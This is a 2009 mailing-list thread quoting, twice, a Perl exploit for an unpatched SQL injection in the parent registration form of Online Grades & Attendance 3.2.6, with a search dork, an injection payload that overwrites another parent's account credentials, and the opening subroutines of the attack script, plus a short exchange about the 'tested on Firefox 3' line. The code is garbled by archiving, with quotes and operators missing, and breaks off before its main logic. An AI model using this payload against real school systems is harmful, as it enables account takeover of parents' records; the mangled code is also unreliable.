Re: (Post Form -- Parent Register (name)) Credentials Changer (SQLi) EXPLOIT -- Online Grades Attendance v-3.2.6--

2009-06-01 Thread Jeremy Brown
Why do you include TESTED ON: firefox 3? Would you not be able to
trigger this bug using other browsers?

On Sun, May 31, 2009 at 8:53 PM,  y3nh4c...@gmail.com wrote:
 #!/usr/bin/perl
 #---
 #(Post Form -- Parent Register (name)) Credentials Changer (SQLi) EXPLOIT -- 
 Online Grades & Attendance v-3.2.6--
 #---
 #
 #CMS INFORMATION:
 #
 #--WEB: http://www.onlinegrades.org/
 #--DOWNLOAD: http://www.onlinegrades.org/
 #--DEMO: http://www.onlinegrades.org/demo_info
 #--CATEGORY: CMS / Education
 #--DESCRIPTION: Online Grades is based on the project, Basmati. It has all 
 of the same
 #               features plus many new features. OG is a web based grade...
 #--RELEASED: 2009-02-05
 #
 #CMS VULNERABILITY:
 #
 #--TESTED ON: firefox 3
 #--DORK: Powered by Online Grades
 #--CATEGORY: SQL INJECTION
 #--AFFECT VERSION: = 3.2.6
 #--Discovered Bug date: 2009-05-21
 #--Reported Bug date: 2009-05-21
 #--Fixed bug date: Not fixed
 #--Info patch: Not fixed
 #--Author: YEnH4ckEr
 #--mail: y3nh4ck3r[at]gmail[dot]com
 #--WEB/BLOG: N/A
 #--COMMENT: A mi novia Marijose...hermano,cunyada, padres (y amigos xD) por 
 su apoyo.
 #--EXTRA-COMMENT: Gracias por aguantarme a todos! (Te kiero xikitiya!)
 #
 #
 #
 #CONDITIONS:
 #
 #
 #gpc_magic_quotes=OFF
 #
 #-
 #PRE-REQUIREMENTS
 #-
 #
 #Option -- Self Registration -- Allowed (Default value)
 #
 #---
 #NEED:
 #---
 #
 #Valid parent id
 #
 #---
 #PROOF OF CONCEPT (SQL INJECTION):
 #---
 #
 #Register module (name) is vuln to sql injection.
 #
 #Full name -- y3nh4ck3r', id=1 ON DUPLICATE KEY UPDATE client_id='owned'#
 #
 #Other parameters -- something
 #
 #
 #Return: Change client_id to 'owned' for parent id=1
 #
 #
 ###
 ###
 ##***##
 ##  SPECIAL GREETZ TO: Str0ke, JosS, Ulises2k, J. McCray, Evil1 ...  ##
 ##***##
 ##---##
 ##***##
 ##              GREETZ TO: SPANISH H4ck3Rs community!                ##
 ##***##
 ###
 ###
 #
 #
 use LWP::UserAgent;
 use HTTP::Request;
 #Subroutines
 # Clears the console and, on Windows only, sets a window title and colour.
 # NOTE(review): this listing appears to have lost characters in mail
 # archiving (the string quotes around clear/cls/win/title/color are gone,
 # as are "->", ">" and "&" elsewhere), so it does not parse as shown;
 # read it as a transcript, not as runnable code.
 sub lw
 {
        my $SO = $^O;                  # Perl's OS name, e.g. "MSWin32" or "linux"
        my $linux = ;                  # garbled: the initial value was lost
        if (index(lc($SO),win)!=-1){   # any OS name containing "win" is treated as Windows
                $linux=0;
        }else{
                $linux=1;              # every non-Windows OS lands here, not only Linux
        }
        if($linux){
                system(clear);         # shell "clear"; fixed word, no user-supplied input
        }
        else{
                system(cls);
                system (title Online Grades Attendance v-3.2.6 (Credentials 
 changer) Exploit);
                system (color 02);     # Windows console colour
        }
 }
 # Sends one HTTP request and returns the whole response (status line,
 # headers and body) as a single string via HTTP::Response::as_string.
 #   $_[0]  URL
 #   $_[1]  POST body (form-urlencoded); unused for GET
 #   $_[2]  "post" selects POST, anything else selects GET
 # NOTE(review): $request is never declared with "my", so it is a package
 # global that leaks out of this sub; no "use strict" is visible in the
 # listing. The fixed User-Agent and a Referer equal to the request URL
 # are stable artifacts of this tool that web-server logs can be matched
 # against. Operators below are garbled ("->" and "=>" lost their ">").
 sub request {
        my $userag = LWP::UserAgent-new;
        $userag - agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');   # browser-like UA string
        if($_[2] eq post){
                $request = HTTP::Request - new(POST = $_[0]);
                $request-referer($_[0]);                        # Referer set to the target URL itself
                $request-content_type('application/x-www-form-urlencoded');
                $request-content($_[1]);
        }else{
                $request = HTTP::Request - new(GET = $_[0]);
        }
        my $outcode= $userag-request($request)-as_string;    # full response text, not only the body
        return $outcode;
 }
 # Prints the generic "not vulnerable" failure banner. It only prints; it
 # neither exits nor sets an exit status, so the caller must do that.
 # NOTE(review): the string quotes were stripped in archiving, so the bare
 # \t\n arguments are not valid Perl as shown.
 sub error {
 print \t\n;
        print \tWeb isn't vulnerable!\n\n;
        print \t---Maybe:\n\n;
        print \t\t1.-Patched.\n;
        print \t\t2.-Bad path or host.\n;
        print \t\tEXPLOIT FAILED!\n;
        print 
 \t\n;
 }
 # Failure banner for the case where the server has magic quotes enabled
 # (the header lists gpc_magic_quotes=OFF as a precondition). From the
 # application side, magic quotes are not a fix: the durable remedy is a
 # parameterised registration query and server-side input validation.
 # Like error(), this sub only prints; it does not exit.
 # NOTE(review): string quotes were stripped in archiving; "Raison" is part
 # of the runtime output and is left as written.
 sub errormagicquotes {
 print \t\n;
        print \tWeb isn't vulnerable!\n\n;
        print \t\tRaison-- Magic quotes ON.\n;
        print \t\tEXPLOIT FAILED!\n;
        print 
 \t\n;
 }
 sub helper {
        print \n\t[!!!] Online Grades  Attendance = v-3.2.6 (Credentials 
 changer) Exploit\n;
        print \t[!!!] USAGE MODE: [!!!]\n;
        print \t[!!!] perl $0 [HOST] [PATH] [Email Address] [Password] 
 [Target_id]\n;
        print \t[!!!] [HOST]: Web.\n;
        print \t[!!!] [PATH]: Home Path.\n;
        print \t[!!!] [Email Address]: Set value\n;
        print \t[!!!] [Password]: Set value\n;
        print \t[!!!] [Target_id]: victim id\n

Re: Re: (Post Form -- Parent Register (name)) Credentials Changer (SQLi) EXPLOIT -- Online Grades Attendance v-3.2.6--

2009-06-01 Thread y3nh4ck3r
Of course not. I include this information to report in detail.



Then...when do you need a browser to launch a perl exploit?



Why do you include TESTED ON: firefox 3? Would you not be able to

trigger this bug using other browsers?



On Sun, May 31, 2009 at 8:53 PM, y3nh4ck3r (at) gmail (dot) com [email 
concealed] wrote:

 #!/usr/bin/perl

 #---



 #(Post Form -- Parent Register (name)) Credentials Changer (SQLi) EXPLOIT -- 
 Online Grades & Attendance v-3.2.6--

 #---



 #

 #CMS INFORMATION:

 #

 #--WEB: http://www.onlinegrades.org/

 #--DOWNLOAD: http://www.onlinegrades.org/

 #--DEMO: http://www.onlinegrades.org/demo_info

 #--CATEGORY: CMS / Education

 #--DESCRIPTION: Online Grades is based on the project, Basmati. It has all 
 of the same

 #   features plus many new features. OG is a web based grade...

 #--RELEASED: 2009-02-05

 #

 #CMS VULNERABILITY:

 #

 #--TESTED ON: firefox 3

 #--DORK: Powered by Online Grades

 #--CATEGORY: SQL INJECTION

 #--AFFECT VERSION: = 3.2.6

 #--Discovered Bug date: 2009-05-21

 #--Reported Bug date: 2009-05-21

 #--Fixed bug date: Not fixed

 #--Info patch: Not fixed

 #--Author: YEnH4ckEr

 #--mail: y3nh4ck3r[at]gmail[dot]com

 #--WEB/BLOG: N/A

 #--COMMENT: A mi novia Marijose...hermano,cunyada, padres (y amigos xD) por 
 su apoyo.

 #--EXTRA-COMMENT: Gracias por aguantarme a todos! (Te kiero xikitiya!)

 #

 #

 #

 #CONDITIONS:

 #

 #

 #gpc_magic_quotes=OFF

 #

 #-

 #PRE-REQUIREMENTS

 #-

 #

 #Option -- Self Registration -- Allowed (Default value)

 #

 #---

 #NEED:

 #---

 #

 #Valid parent id

 #

 #---

 #PROOF OF CONCEPT (SQL INJECTION):

 #---

 #

 #Register module (name) is vuln to sql injection.

 #

 #Full name -- y3nh4ck3r', id=1 ON DUPLICATE KEY UPDATE client_id='owned'#

 #

 #Other parameters -- something

 #

 #

 #Return: Change client_id to 'owned' for parent id=1

 #

 #

 ###

 ###

 ##***##

 ##  SPECIAL GREETZ TO: Str0ke, JosS, Ulises2k, J. McCray, Evil1 ...  ##

 ##***##

 ##---##

 ##***##

 ##  GREETZ TO: SPANISH H4ck3Rs community!##

 ##***##

 ###

 ###

 #

 #

 use LWP::UserAgent;

 use HTTP::Request;

 #Subroutines

 # Clears the console and, on Windows only, sets a window title and colour.
 # NOTE(review): this quoted listing appears to have lost characters in
 # mail archiving (string quotes, "->", ">" and "&"), and the blank lines
 # between statements are a quoting artifact; it does not parse as shown.
 sub lw

 {

my $SO = $^O;                  # Perl's OS name, e.g. "MSWin32" or "linux"

my $linux = ;                  # garbled: the initial value was lost

if (index(lc($SO),win)!=-1){   # any OS name containing "win" is treated as Windows

$linux=0;

}else{

$linux=1;                      # every non-Windows OS lands here, not only Linux

}

if($linux){

system(clear);                 # shell "clear"; fixed word, no user-supplied input

}

else{

system(cls);

system (title Online Grades Attendance v-3.2.6 (Credentials 
 changer) Exploit);

system (color 02);             # Windows console colour

}

 }

 # Sends one HTTP request and returns the whole response (status line,
 # headers and body) as a single string via HTTP::Response::as_string.
 #   $_[0]  URL
 #   $_[1]  POST body (form-urlencoded); unused for GET
 #   $_[2]  "post" selects POST, anything else selects GET
 # NOTE(review): $request is never declared with "my", so it is a package
 # global that leaks out of this sub; no "use strict" is visible. The fixed
 # User-Agent and a Referer equal to the request URL are stable artifacts
 # of this tool that web-server logs can be matched against. Operators
 # below are garbled ("->" and "=>" lost their ">").
 sub request {

my $userag = LWP::UserAgent-new;

$userag - agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');   # browser-like UA string

if($_[2] eq post){

$request = HTTP::Request - new(POST = $_[0]);

$request-referer($_[0]);                        # Referer set to the target URL itself

$request-content_type('application/x-www-form-urlencoded');

$request-content($_[1]);

}else{

$request = HTTP::Request - new(GET = $_[0]);

}

my $outcode= $userag-request($request)-as_string;    # full response text, not only the body

return $outcode;

 }

 # Prints the generic "not vulnerable" failure banner. It only prints; it
 # neither exits nor sets an exit status, so the caller must do that.
 # NOTE(review): the string quotes were stripped in archiving, so the bare
 # \t\n arguments are not valid Perl as shown.
 sub error {

 print \t\n;

print \tWeb isn't vulnerable!\n\n;

print \t---Maybe:\n\n;

print \t\t1.-Patched.\n;

print \t\t2.-Bad path or host.\n;

print \t\tEXPLOIT FAILED!\n;

print 
 \t\n;

 }

 # Failure banner for the case where the server has magic quotes enabled
 # (the header lists gpc_magic_quotes=OFF as a precondition). From the
 # application side, magic quotes are not a fix: the durable remedy is a
 # parameterised registration query and server-side input validation.
 # Like error(), this sub only prints; it does not exit.
 # NOTE(review): string quotes were stripped in archiving; "Raison" is part
 # of the runtime output and is left as written.
 sub errormagicquotes {

 print \t\n;

print \tWeb isn't vulnerable!\n\n;

print \t\tRaison-- Magic quotes ON.\n;

print \t\tEXPLOIT FAILED!\n;

print 
 \t\n;

 }

 sub helper {

print \n\t[!!!] Online Grades  Attendance = v-3.2.6 (Credentials 
 changer) Exploit\n;

print \t[!!!] USAGE MODE: [!!!]\n;

print \t